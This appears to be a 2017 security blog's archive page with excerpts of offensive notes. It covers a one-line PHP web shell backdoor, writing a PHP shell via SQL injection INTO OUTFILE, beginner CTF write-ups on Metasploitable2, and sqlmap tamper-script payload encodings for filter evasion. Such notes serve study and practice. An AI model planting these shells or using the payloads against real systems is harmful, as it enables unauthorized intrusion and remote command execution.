Showing posts from 2017

From SHELL to POWERSHELL

Just to keep for my notes and reference, because sometimes it is hard to recall how to do these things. See 'clam' for more and `bash' for a shell script!

[ASCII-art clam, credit hjw]

Ok, let's assume that we are able to inject some malicious payload/code, e.g. through phpMyAdmin or whatever low-hanging fruit is on the target (SQLi, RCE or whatever).

1. For PHP, these are the useful snippets:

======== PHP Info ========
<? phpinfo(); ?>
This might be useful for us to identify file paths, default folders etc.

================ Simple PHP Backdoor ================
<?php system($_GET['cmd']); ?>
or
<?php if(isset($_REQUEST[

SQLiiiii

This is a re-post from an old archive ... From the MySQL documentation: "The SELECT ... INTO OUTFILE 'file_name' form of SELECT writes the selected rows to a file. The file is created on the server host, so you must have the FILE privilege to use this syntax. file_name cannot be an existing file, which among other things prevents files such as /etc/passwd and database tables from being destroyed. As of MySQL 5.0.19, the character_set_filesystem system variable controls the interpretation of the filename." The INTO OUTFILE operator can be used during SQL injection exploitation to write a PHP shell on the remote host. Unfortunately (fortunately?) this is only possible under some (very) rare conditions: the mysql user must have the FILE privilege; the operator requires a "quoted" file pathname, so the web application must not escape/filter the quotes; httpd and mysql should be installed on the same machine, or (if you can) the file will be written on the dbms machi

CTF Politeknik Mersing 2017 Writeups

Some writeups for CTF Politeknik Mersing 2017. Honestly, I'm not really an expert or experienced at crafting CTF challenges. But for this competition my intention was only to target beginners, and surprisingly some of them were able to answer the challenges and some were not. The challenges combine some basic cryptography elements with basic exploitation based on the Metasploitable2 vulnerable image. Ok, here is the list of questions and challenges for the event:

Information Gathering
1. Mesej Tersembunyi (Flag 1)
2. Mesej Tersembunyi lagi (Flag 2)

Exploitation
1. Mencari Kucing sesat (Flag 3)
2. Tidak Benar Belaka (Flag 4)
3. Tiga Abdul - Abdul Wahab, Abdul Wahib & Abdul Wahub (Flag 5)

Forensic Challenge
1. Image Forensic - Steganography

A total of 6 challenges! All you have to do is own this box in order to get all the flags, except for Steganography.

Flag 1: Mesej Tersembunyi
Viewing the source from the browser we found this.

List of SQLMAP Tamper Scripts

Just a re-post of one of my visited reference blog posts. Original URL: http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html

Name / Description / Example

apostrophemask.py - Replaces apostrophe character with its UTF-8 full width counterpart. Example: '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py - Replaces apostrophe character with its illegal double unicode counterpart. Example: '1 AND %271%27=%271'

appendnullbyte.py - Appends encoded NULL byte character at the end of payload. Example: '1 AND 1=1'

base64encode.py - Base64 all characters in a given payload. Example: 'MScgQU5EIFNMRUVQKDUpIw=='

between.py - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'. Example: '1 AND A NOT BETWEEN 0 AND B--'

bluecoat.py - Replaces space character after SQL statement with a valid random blank character. Afterwards replaces character = with LIKE operator. Example: 'SELECT%09id FROM users where id LIKE 1'

chardoubleencode.py - Double url-encodes all character